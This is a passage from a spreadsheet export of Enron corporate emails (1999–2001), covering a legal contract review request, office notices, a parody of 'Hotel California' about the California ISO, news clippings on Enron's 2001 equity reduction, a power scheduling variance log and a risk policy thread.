Cc:	Haedicke, Mark E.; Schuler, Lance (Legal); Mintz, Jordan_x000D_
Subject:	Material Contract Review -- ASAP_x000D_
_x000D_
We just have been asked to review on an expedited basis all material contracts of ENE and ENA for change-of-control type provisions.  Please let us know what contracts or guidance you may have or know of; we need to begin reviewing/collecting information ASAP, i.e., this weekend.  If you know of someone who should receive this e-mail but who has not, please forward.  You may contact me at any of the below numbers.  _x000D_
_x000D_
Thanks for your help._x000D_
_x000D_
Regards, NJD_x000D_
_x000D_
Nora J. Dobin_x000D_
Senior Counsel_x000D_
Enron Corp. - Global Finance_x000D_
1400 Smith Street, Suite 2083_x000D_
Houston, Texas 77002_x000D_
_x000D_
Phone:  713/345-7723_x000D_
Fax:      713/853-9252_x000D_
_x000D_
Home:	713/864-1175</t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 03:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sgussett@bracepatt.com'})</t>
  </si>
  <si>
    <t>Sam's Birthday</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
We are so bad - we suddenly woke up and realized that Friday is December _x000D_
1st.  That means Saturday is the 2nd - Sam's birthday.  SO I'm writing _x000D_
invitations now.  Here it is: _x000D_
_x000D_
Can Eleanor and Alice join us on Saturday for a train party at the zoo?  _x000D_
Around 10:00?  We would love to have you all come too, or not, if you prefer _x000D_
to  ..... shop._x000D_
_x000D_
PS Hope your holidays were, well, a holiday.</t>
  </si>
  <si>
    <t>Wed, 22 Dec 1999 08:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mary.smith@enron.com', 'david.baumbach@enron.com', 'bryan.hull@enron.com', 'lisa.csikos@enron.com', 'steve.venturatos@enron.com', 'pat.clynes@enron.com', 'eric.bass@enron.com', "o'neal.winfree@enron.com", 'michael.walters@enron.com', 'rita.wynne@enron.com', 'daren.farmer@enron.com', 'kenneth.walther@enron.com'})</t>
  </si>
  <si>
    <t>Out of the Office</t>
  </si>
  <si>
    <t xml:space="preserve">I will be out of the office beginning Thursday, 12/24, returning on Tuesday, _x000D_
1/4.  In my absence, I have asked Steve Venturatos to be the point person for _x000D_
Texas Operations._x000D_
_x000D_
I realize that many of you will be working over the New Year's week-end to _x000D_
ensure a smooth transaction into the new year.  In advance, I truly _x000D_
appreciate all of the efforts.  Additionally, I would like to be kept _x000D_
informed on any critical issues, mainly so that I have no surprises when I _x000D_
return.  Therefore, I have provided numbers below where I can be reached.  I _x000D_
will leave it to your discretion as to whether you call me or leave me a _x000D_
voice mail in the office.  As you all know, I would rather be informed than _x000D_
surprised!_x000D_
_x000D_
Pager  877-497-3757_x000D_
Cellular  713-417-2995_x000D_
Home  970-920-2293 &amp;_x000D_
  970-920-2294_x000D_
_x000D_
_x000D_
Thanks to each of you for your dedication.  I hope each of you have a _x000D_
wonderful and safe holiday!_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Aug 2000 02:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.austin@enron.com'})</t>
  </si>
  <si>
    <t>Your NYISO Certificate Request</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Larry F Campbell/NA/Enron on 08/29/2000 _x000D_
09:35 AM ---------------------------_x000D_
_x000D_
_x000D_
cert@nyiso.com on 08/21/2000 02:07:33 PM_x000D_
To: undisclosed-recipients:;_x000D_
cc:  _x000D_
_x000D_
Subject: Your NYISO Certificate Request_x000D_
_x000D_
_x000D_
Your NYISO certificate application has been approved._x000D_
_x000D_
With the same computer and browser you used to make the application,_x000D_
you can pick-up/install your new NYISO digital certificate at:_x000D_
_x000D_
http://cert.nyiso.com/displayBySerial?op=displayBySerial&amp;serialNumber=638_x000D_
_x000D_
Please contact Market Relations if you experience any problem_x000D_
either installing or using your new NYISO digital certificate._x000D_
_x000D_
518-356-6060_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 10:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>Hotel California ISO</t>
  </si>
  <si>
    <t xml:space="preserve">Thought you might like to see this, if it had not made the rounds in _x000D_
California/USA.  mcs_x000D_
---------------------- Forwarded by Mark Schroeder/LON/ECT on 10/04/2001 _x000D_
17:21 ---------------------------_x000D_
_x000D_
_x000D_
Paul Hennemeyer_x000D_
10/04/2001 17:17_x000D_
To: Mark Schroeder/LON/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Hotel California ISO_x000D_
_x000D_
An entertaining note on your last day. _x000D_
---------------------- Forwarded by Paul Hennemeyer/LON/ECT on 10/04/2001 _x000D_
12:17 ---------------------------_x000D_
_x000D_
_x000D_
atownsend1@worldbank.org on 10/04/2001 11:07:45_x000D_
To: Paul Hennemeyer &lt;Paul_Hennemeyer@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Hotel California ISO_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Alan F. Townsend/Person/World Bank on_x000D_
04/10/2001 11:07 AM ---------------------------_x000D_
_x000D_
From: Apurva Sanghi on 04/09/2001 02:57 PM_x000D_
Extn: 88974           PSAPF_x000D_
_x000D_
_x000D_
To:   Alan F. Townsend, Jordan Z. Schwartz, Ian Alexander, Clive G. Harris_x000D_
cc:_x000D_
bcc:_x000D_
_x000D_
Subject:  Hotel California ISO_x000D_
_x000D_
This is funny..._x000D_
_x000D_
----- Forwarded by Apurva Sanghi/Person/World Bank on 04/09/2001 02:55 PM _x000D_
-----_x000D_
_x000D_
?? On a? dark Western highway_x000D_
?? No wind in my  hair_x000D_
?? No rain for the hydro_x000D_
?? No NOX in the?  air_x000D_
?? Up ahead in the distance_x000D_
?? I saw a?  flickering sight_x000D_
?? The load grew heavy and the lights grew?  dim_x000D_
?? No relief in the night_x000D_
?? So we? stood in  the darkness_x000D_
?? Down at the Taco Bell_x000D_
?? And I was  thinking to myself_x000D_
?? This? could be Heaven or this could be  Hell_x000D_
?? We lit up a candle_x000D_
?? No power in the  Bay_x000D_
?? There were? voices down the corridor_x000D_
?? I  thought I heard them say* ?_x000D_
_x000D_
?? Welcome to the ISO  California_x000D_
?? Such a lovely place_x000D_
?? Such a  lovely? place_x000D_
?? Such a lovely face_x000D_
?? Powering  up? for the ISO California_x000D_
?? What a nice  surprise_x000D_
?? What a nice surprise_x000D_
?? Bring your?  alibis* ?_x000D_
_x000D_
?? Its mind is policy? twisted_x000D_
??  Can't stop consumption trends_x000D_
?? Got a lot of NIMBY  boys_x000D_
?? Cisco calls? friends_x000D_
?? How we sweat in  the courthouse_x000D_
?? Sweet summer sweat_x000D_
?? Without the  AC_x000D_
?? We try to forget_x000D_
?? So I called up the?  Gov'nor_x000D_
?? Please energize this line_x000D_
?? He?  said_x000D_
?? We haven't built a new plant here since  1969_x000D_
?? Last thing I remember_x000D_
?? We were? running  for the door_x000D_
?? We had to find the passage back to? the place  we were before_x000D_
?? Relax said Judge Damrell_x000D_
??  California's programmed to receive_x000D_
?? Go belly up any time you  like_x000D_
?? But? your power can never leave_x000D_
_x000D_
Well it had to  happen.........._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 00:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dari.dornan@enron.com', 'tony.pryor@enron.com', 'maria.pavlou@enron.com'})</t>
  </si>
  <si>
    <t>Re: EOL Webtext - - Day to day firm</t>
  </si>
  <si>
    <t xml:space="preserve">Are we all on the same page that this is OK?  Is MKM's group good on it?  (I _x000D_
didn't see anyone from her group listed on the distribution). DF_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Tony Pryor_x000D_
03/09/2001 04:43 PM_x000D_
To: Steve Kirk/Enron@EnronXGate, Eileen Peebles/Enron@EnronXGate, Jeff _x000D_
Nielsen/Enron@EnronXGate, Craig Buehler/Enron@EnronXGate, Vernon _x000D_
Mercaldo/Enron@EnronXGate, David Forster/Corp/Enron@Enron, Carl _x000D_
Carter/NA/Enron@Enron, Dari Dornan/ET&amp;S/Enron@ENRON, Maria _x000D_
Pavlou/Enron@EnronXGate, Drew Fossum/ET&amp;S/Enron@ENRON_x000D_
cc: cc: Steve Hotte/Enron@EnronXGate _x000D_
_x000D_
Subject: EOL Webtext - - Day to day firm_x000D_
_x000D_
Attached is the revised webtext for the day to day versions of the R+C, RMn _x000D_
and RMx sustainable products, reflecting comments received this week. The _x000D_
format has been changed to be consistent with the revised format of the _x000D_
sustainable products. I would appreciate receiving your comments by noon, _x000D_
Wednesday, March 14._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 00:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Ergonomics Notice</t>
  </si>
  <si>
    <t xml:space="preserve">Cindy -- it seems to me we should use an HR distribution to get this out.  _x000D_
Let Mike and I know what you think._x000D_
----- Forwarded by Steven J Kean/NA/Enron on 12/12/2000 08:06 AM -----_x000D_
_x000D_
	Michael Terraso_x000D_
	12/11/2000 08:32 AM_x000D_
		 _x000D_
		 To: Steven Kean_x000D_
		 cc: Maureen McVicker_x000D_
		 Subject: Ergonomics Notice_x000D_
_x000D_
Steve,_x000D_
 the attached is a one page summary safety notice to describe to management _x000D_
the requirements of the OSHA ergonomics rule and our action plan to comply.  _x000D_
I need your advice on an internal distribution list for the notice.   Thanks, _x000D_
Mike T._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 14:29:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stephen.dowd@enron.com', 'danny.mccarty@enron.com'})</t>
  </si>
  <si>
    <t>FW: Enron Mentions</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Votaw, Courtney  _x000D_
Sent:	Thursday, October 18, 2001 3:50 PM_x000D_
Subject:	Enron Mentions_x000D_
_x000D_
Enron cuts shareholder equity by 1.2 bln usd due to partnership deal_x000D_
AFX News, 10/18/01_x000D_
_x000D_
Calif Energy Panel OKs First Step For 1160MW In Projects_x000D_
Dow Jones Energy Service, 10/18/01_x000D_
_x000D_
USA: Enron's stock slides as equity reduction digested._x000D_
Reuters English News Service, 10/18/01_x000D_
_x000D_
Brazil's Copene, Elektro Plan to Sell 820 Mln Reais of Bonds_x000D_
Bloomberg, 10/18/01_x000D_
_x000D_
Enron cuts shareholder equity by 1.2 bln usd due to partnership deal_x000D_
_x000D_
10/18/2001_x000D_
AFX News_x000D_
(c) 2001 by AFP-Extel News Ltd_x000D_
LONDON (AFX) - Enron Corp said it has reduced its shareholder equity by 1.2 bln usd as the company decided to repurchase 55 mln of its shares that it had issued as part of a series of complex transactions with an investment vehicle connected to its chief financial officer, Andrew Fastow, the Wall Street Journal reported in its online edition. _x000D_
Enron did not disclose the big equity reduction in its earnings release issued on Tuesday, when the Houston-based energy giant announced a 1.01 bln usd charge to third-quarter earnings that produced a 618 mln usd loss._x000D_
However, the company briefly mentioned it in a subsequent call with security analysts and confirmed it in response to questions yesterday. As a result of the reduction, Enron's shareholder equity dropped to 9.5 bln usd, the company said. _x000D_
In an interview, Enron Chairman Kenneth Lay said about 35 mln usd of the 1.01 bln usd charge to earnings was related to transactions with LJM2 Co-Investment LP, a limited partnership created and run by Fastow. _x000D_
In a conference call yesterday with investors, Lay said 55 mln shares had been repurchased by Enron, as the company "unwound" its participation in the transactions. In the third quarter, the company's average number of shares outstanding was 913 mln. _x000D_
According to Rick Causey, Enron's chief accounting officer, these shares were contributed to a "structured finance vehicle" set up about two years ago in which Enron and LJM2 were the only investors. In exchange for the stock, the entity provided Enron with a note. _x000D_
The aim of the transaction was to provide hedges against fluctuating values in some of Enron's broadband telecommunications and other technology investments. Causey did not elaborate on what form those hedges took. _x000D_
Subsequently, both the value of Enron's stock and the value of the broadband investments hedged by the entity dropped sharply, the report said. As a result, Enron decided essentially to dissolve the financing vehicle and reacquire the shares. When Enron reacquired the shares, it also canceled the note it had received from the entity. _x000D_
Given all the complexities of the LJM-related financing vehicle and the questions it raised outside the company, "the confusion factor wasn't worth the trouble of trying to continue this," Causey said. _x000D_
Mark Palmer, an Enron spokesman, described the capital reduction "as just a balance-sheet issue" and therefore was not deemed "material" for disclosure purposes. _x000D_
gc For more information and to contact AFX: www.afxnews.com and www.afxpress.com_x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Calif Energy Panel OKs First Step For 1160MW In Projects_x000D_
_x000D_
10/18/2001_x000D_
Dow Jones Energy Service_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
LOS ANGELES -(Dow Jones)- The California Energy Commission has accepted as "data adequate" applications to build a 900-megawatt power plant and two peaker plants totaling 260 megawatts, a press release said. _x000D_
The data adequacy vote means an application has been accepted as having sufficient information to proceed with the commission's approval process._x000D_
Enron Corp.'s (ENE) Roseville Energy Facility LLC unit has proposed building a 900-MW natural gas-fired plant in Sacramento, Calif., to be online by the fourth quarter of 2004. The construction cost will be $350-$450 million for the combined-cycle project, which will undergo a 12-month review process by the commission. _x000D_
GWF Energy LLC has applied to build the 169-MW Tracy Peaker Project, a simple cycle plant in the San Joaquin Valley, Calif., that would be online by July 2002. Peaker plants operate during times of high electricity demand. _x000D_
The company also applied to build the 91-MW Henrietta Peaker Project, 20 miles south of Hanford, Calif., which would consist of two turbine generators and come on line by June 2002. _x000D_
Electricity generated from the two peaker projects will be sold to the state's Department of Water Resources under a 10-year contract. _x000D_
-By Jessica Berthold, Dow Jones Newswires; 323-658-3872; jessica.berthold@dowjones.com_x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
USA: Enron's stock slides as equity reduction digested._x000D_
_x000D_
10/18/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
HOUSTON, Oct 18 (Reuters) - Enron Corp. stock fell sharply on Thursday as investors digested news of a $1.2 billion reduction in the energy giant's shareholder equity that attracted little attention when it was first disclosed earlier this week. _x000D_
In afternoon trading Enron's stock was off $2.96 or, 9.2 percent at $29.24 per share._x000D_
Enron reported its first quarterly loss in over four years on Tuesday after taking charges of $1.01 billion against earnings to cover expenses and writedowns on investments that fall outside its core wholesale energy operations. _x000D_
The reduction in shareholder equity was not mentioned in the company's earnings statement but was discussed by Chairman and Chief Executive Ken Lay in an earnings conference call with analysts and investors on Tuesday. _x000D_
"Confidence has been shaken by the incremental disclosure. This is an extremely widely held stock and to assume that everybody listened to the conference call is probably asking too much," said one analyst who asked not to be identified. _x000D_
The reduction in equity was prominently reported in the Wall Street journal on Thursday, bringing it to the attention of a wider audience, analysts said. _x000D_
Lay said the equity writedown and a corresponding reduction in the number of Enron shares outstanding were related to the early termination of structured finance arrangements which had drawn criticism from some Wall Street analysts. _x000D_
As a result of the operation, Enron's debt to total capitalization ratio will rise to about 50 percent, but the company expects the proceeds of asset sales to reduce the ratio to around 40 percent by the end of next year, Lay said. _x000D_
Moody's Investor Service said earlier this week that it had placed all of Enron's long-term debt obligations on review for a possible downgrade because writedowns and charges had substantially reduced valuations for several Enron businesses. _x000D_
Some of Enron's financing arrangements require the company to maintain investment grade credit ratings._x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Brazil's Copene, Elektro Plan to Sell 820 Mln Reais of Bonds_x000D_
2001-10-18 13:53 (New York)_x000D_
_x000D_
_x000D_
     Rio de Janeiro, Oct. 18 (Bloomberg) -- Two Brazilian_x000D_
companies have asked securities regulators for permission to sell_x000D_
820 million reais ($279 million) of bonds, raising the amount of_x000D_
pending local market bond sales to 7.5 billion reais._x000D_
_x000D_
     Brazil's Copene-Petroquemica do Nordeste SA, a Petrochemical_x000D_
company, has asked Brazil's government for permission to sell 625_x000D_
million reais of bonds according to the country's security and_x000D_
exchange regulator, the CVM. Banco Citibank SA, the Brazilian unit_x000D_
of Citigroup Inc., will manage the sale._x000D_
_x000D_
     Elektro Eletricidade e Servicos SA, an electricity utility_x000D_
controlled by U.S.-based Enron Corp. that distributes electricity_x000D_
in Sao Paulo state, has asked for permission to sell 195 million_x000D_
reais of bonds, according to a CVM filing._x000D_
_x000D_
     No further details about the sales was immediately available._x000D_
     Brazilian companies have scrambled to sell debt at home as_x000D_
the local currency, the real, plunges against the dollar, making_x000D_
dollar-denominated debt expensive and causing losses to mount as_x000D_
the local currency value of dollar debts soars._x000D_
_x000D_
     So far this year, about 9.1 billion reais of local market_x000D_
debt has been sold. Meanwhile corporate bond sales in euros or_x000D_
dollars has slipped by almost two thirds to $1.7 billion in the_x000D_
third quarter from $4.5 billion in the second, not including sales_x000D_
through offshore subsidiaries, according to Bloomberg data.</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 07:48:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rgatlin@cmgtx.com'})</t>
  </si>
  <si>
    <t>RE: Big John</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 Congrats. on the young Michael!  That must be fantastic...my fiance is from Houston and we go up to Spring periodically to visit her folks and I would love to hook up with you and the family if possible on one of those trips...yes, it is a common problem for traders - my dad eventually demoted himself back to the action - I think he said something about executive management draining the life blood from his veins?_x000D_
I am spending a lot of time in Detroit on our latest acquisition...it is looking like another home run...I will attach the press release.._x000D_
Congrats on all the successes!  I am glad things are so well for you... _x000D_
Best regards, _x000D_
Ross _x000D_
-----Original Message----- _x000D_
From: John.J.Lavorato@enron.com _x000D_
To: rgatlin@cmgtx.com; lavorato@enron.com _x000D_
Sent: 5/21/01 3:44 PM _x000D_
Subject: RE: Big John _x000D_
What's up Ross. _x000D_
To your questions: _x000D_
Yes to Houston _x000D_
Yes to Enron _x000D_
Almost to running the company although I'm thinking about demoting _x000D_
myself _x000D_
(I miss trading). _x000D_
Married, one child, 2 1/2 Michael. _x000D_
Give me a call if your in Houston and we'll have a few drinks. _x000D_
John Lavorato _x000D_
President and Chief Executive Officer _x000D_
Enron Americas _x000D_
713-853-7991 _x000D_
Lavorato@enron.com _x000D_
    -----Original Message----- _x000D_
   From:   Ross Gatlin &lt;rgatlin@cmgtx.com&gt;@ENRON _x000D_
  _x000D_
[mailto:IMCEANOTES-Ross+20Gatlin+20+3Crgatlin+40cmgtx+2Ecom+3E+40ENRON@E  _x000D_
NRON.com] _x000D_
   Sent:   Wednesday, May 16, 2001 7:35 AM _x000D_
   To:     'lavorato@enron.com' _x000D_
   Subject:  Big John _x000D_
   John baby, _x000D_
   What are you up to?  Are you in Houston?  If so, we should touch base _x000D_
@ _x000D_
   some point.  Still with Enron?  Do you run the company yet?  Are you _x000D_
   responsible for my pricing at the pump?  I have been back in Dallas _x000D_
   since '95 and am working with The Carlyle Group...getting married in _x000D_
   August...you? _x000D_
   Hope all is well. _x000D_
   Best regards, _x000D_
   Ross _x000D_
   Founding Partner _x000D_
   Carlyle Management Group _x000D_
   200 Crescent Court, Suite 1900 _x000D_
   Dallas TX 75201 _x000D_
   rgatlin@cmgtx.com _x000D_
   214-762-3443 C _x000D_
   214-756-6260 W _x000D_
  _x000D_
 - CMG Acquisition-Key Plastics.doc </t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 22:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/11/01; HourAhead hour: 6;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/11/01; HourAhead hour: 6;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Generation schedule._x000D_
Variances detected in Energy Import/Export schedule._x000D_
Variances detected in Load schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001041106.txt_x000D_
_x000D_
---- Generation Schedule ----_x000D_
$$$ Variance found in table tblGEN_SCHEDULE._x000D_
     Details: (Hour: 6 / Preferred:  36.25 / Final:  20.00)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: TOSCO_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  UNIT_ID: UNCHEM_1_UNIT_x000D_
_x000D_
_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 6 / Preferred:  47.00 / Final:  46.99)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTstSW_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  TIE_POINT: MEAD_2_WALC_x000D_
  INTERCHG_ID: EPMI_CISO_8000_x000D_
  ENGY_TYPE: WHEEL_x000D_
+++ Hour 6 - bad data from ISO._x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_BUNNY_x000D_
  ENGY_TYPE: WHEEL_x000D_
+++ Hour 6 - bad data from ISO._x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  TIE_POINT: SLVRPK_7_SPP_x000D_
  INTERCHG_ID: EPMI_CISO_BUNNY_x000D_
  ENGY_TYPE: WHEEL_x000D_
_x000D_
_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 6 / Preferred:   0.45 / Final:   0.30)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE1_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  SC_ID: EPMI_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 6 / Preferred:   4.89 / Final:   3.33)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE2_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  SC_ID: EPMI_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 6 / Preferred:  44.68 / Final:  30.17)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE3_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  SC_ID: EPMI_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 6 / Preferred: 100.17 / Final: 100.16)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: SDG1_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/11/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 06:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Lay/Skilling Talking Points for Bush Admin Meetings and Calls</t>
  </si>
  <si>
    <t xml:space="preserve">I think these are quite good...the missing piece, I would argue, that we need _x000D_
to include is a talking point on the need for FERC to focus significant _x000D_
resources on the identification and elimination of market power in _x000D_
electricity markets and the need to encourage the development of distributed _x000D_
generation and more effective demand - side response mechanisms , partly in _x000D_
response to market power concerns. This is a huge issue in  getting wholesale _x000D_
electricity markets to work effectively, i.e; to create discernable  consumer _x000D_
welfare benefits.... and we ( Enron ) need to talk about this this issue and _x000D_
concern and talk about it frequently and w/ the same passion we talk about _x000D_
the need for open markets._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Linda Robertson_x000D_
04/04/2001 12:09 PM_x000D_
To: Steven J Kean/NA/Enron@Enron_x000D_
cc: Richard Shapiro/NA/Enron@Enron, Joe Hartsoe/Corp/Enron@ENRON, Tom _x000D_
Briggs/NA/Enron@Enron _x000D_
_x000D_
Subject: Lay/Skilling Talking Points for Bush Admin Meetings and Calls_x000D_
_x000D_
Steve, per our conversation yesterday in Houston, what do you think of these _x000D_
TPs?  To be used by both Ken and Jeff in conversations and meetings with the _x000D_
Bush Administration._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Skilling Talking Points.doc_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>he's a trip</t>
  </si>
  <si>
    <t>Thu, 17 Aug 2000 10:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ann.white@enron.com', 'tana.jones@enron.com', 'mark.taylor@enron.com', 'susan.bailey@enron.com'})</t>
  </si>
  <si>
    <t>Vacation Day - Mon. 8/21</t>
  </si>
  <si>
    <t>I would like to take one day of Vacation on Monday, 8/2.   Please confirm at _x000D_
your earliest convenience, so I may contact Brenda for coverage of my desk._x000D_
_x000D_
thanks_x000D_
Taffy</t>
  </si>
  <si>
    <t>Tue, 13 Jun 2000 03:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Revised RM Policy</t>
  </si>
  <si>
    <t xml:space="preserve">Boyd confirmed his availability.  We expect his call at 10:30 a.m. this _x000D_
morning._x000D_
_x000D_
Thanks!  DT_x000D_
_x000D_
&gt;&gt;&gt; &lt;Kay.Mann@enron.com&gt; 06/13/00 09:06AM &gt;&gt;&gt;_x000D_
FYI.  Is there a conference call scheduled for today, and is Boyd available_x000D_
tomorrow?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 06/13/2000 09:05_x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
(Embedded_x000D_
image moved_x000D_
to file:      From:  Gregg Penman_x000D_
pic18735.pcx) 06/13/2000 07:50 AM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To:   Kay Mann/Corp/Enron@Enron_x000D_
cc:_x000D_
_x000D_
Subject:  Re: Revised RM Policy_x000D_
_x000D_
Per my voice mail, will you please take a quick look at my edits to Vlady's_x000D_
draft risk management policy attached below.  I don't think any of them are_x000D_
problematic, but Vlady has some concerns mainly because the base Enron_x000D_
Corp. risk management policy was used as the template and therefore I am_x000D_
effectively making edits to it._x000D_
_x000D_
I will be leaving the office today around 11:00 so I want to turn this to_x000D_
Peoples before then if possible.  On any other business, I will be_x000D_
unavailable from 1:30 to probably 3:00 today, but can be reached via pager_x000D_
800-980-1771 or cell phone 312-925-8888 at any other time._x000D_
_x000D_
As always - thanks for your help._x000D_
_x000D_
Gregg_x000D_
---------------------- Forwarded by Gregg Penman/Corp/Enron on 06/13/2000_x000D_
07:45 AM ---------------------------_x000D_
_x000D_
To:   Vladimir Gorny/HOU/ECT@ECT_x000D_
cc:_x000D_
Subject:  Re: Revised RM Policy  (Document link: Gregg Penman)_x000D_
_x000D_
Some comments on your comments:_x000D_
_x000D_
Section II:    I don't like the title "Commercial Development Manager" but_x000D_
rather "Risk Manager"_x000D_
Response:         The title Commercial Development Manager comes from the_x000D_
MEH Operating Agreement.  We can amend the LLC Agreement  if necessary, but_x000D_
it seems burdensome since the title is only a formality.  However, as_x000D_
currently written, the Commercial Development Manager is the person_x000D_
responsible for managing the daily business, i.e. similar to a desk_x000D_
director.  In order to maintain control of this position, it can only be_x000D_
filled by an Enron nominee and will report directly to the MEH General_x000D_
Manager, Laura Luce of Enron._x000D_
_x000D_
Section VII:   Majority of the wording came initially from attorneys, I_x000D_
would recommend confirming that._x000D_
Response:          I will run this by the attorneys.  However, from a_x000D_
technical perspective, Section VII refers to employees of MEH.  No one in_x000D_
the Chicago office is an employee of MEH, but rather we all remained_x000D_
employees of our respective organizations.  I will ask the attorneys if we_x000D_
need to limit all Chicago based employees, both of Enron North America and_x000D_
Peoples Energy Resources._x000D_
_x000D_
Section VIII:  Who is the General Manager of MEH?_x000D_
Response:          As mentioned above, Laura Luce, Vice President of Enron_x000D_
North America_x000D_
Is Enron North America Corp. a legal entity?_x000D_
Response:          Yes, Enron North America Corp. replaced Enron Capital_x000D_
Trade and Resources as the Wholesale business of Enron Corp.  Unless you_x000D_
know something different, I believe that to be a true statement._x000D_
_x000D_
Let me know if any of my responses don't make sense or you still have any_x000D_
questions.  I am still going to try to get this out by 10:00 or so._x000D_
_x000D_
Gregg_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To:   Gregg Penman/Corp/Enron@ENRON_x000D_
cc:_x000D_
Subject:  Re: Revised RM Policy  (Document link: Gregg Penman)_x000D_
_x000D_
Policy Comments:_x000D_
_x000D_
Section II:    I don't like the title "Commercial Development Manager" but_x000D_
rather "Risk Manager"_x000D_
Section VII:   Majority of the wording came initially from attorneys, I_x000D_
would recommend confirming that._x000D_
Section VIII:  Who is the General Manager of MEH?_x000D_
Is Enron North America Corp. a legal entity?_x000D_
_x000D_
Vlady._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
(Embedded_x000D_
image moved_x000D_
to file:      From:  Gregg Penman @ ENRON_x000D_
pic24074.pcx) 06/12/2000 02:03 PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To:   Vladimir Gorny/HOU/ECT@ECT_x000D_
cc:_x000D_
Subject:  Revised RM Policy_x000D_
_x000D_
Vlady - As we discussed, I am attaching my revisions to your initial draft._x000D_
They are mainly cosmetic attempts to make the RM Policy terms consistent_x000D_
with the MEH Operating Agreement and separate MEH from any behind the_x000D_
scenes reporting or controls that ENA chooses to place on Richard/MEH.  Let_x000D_
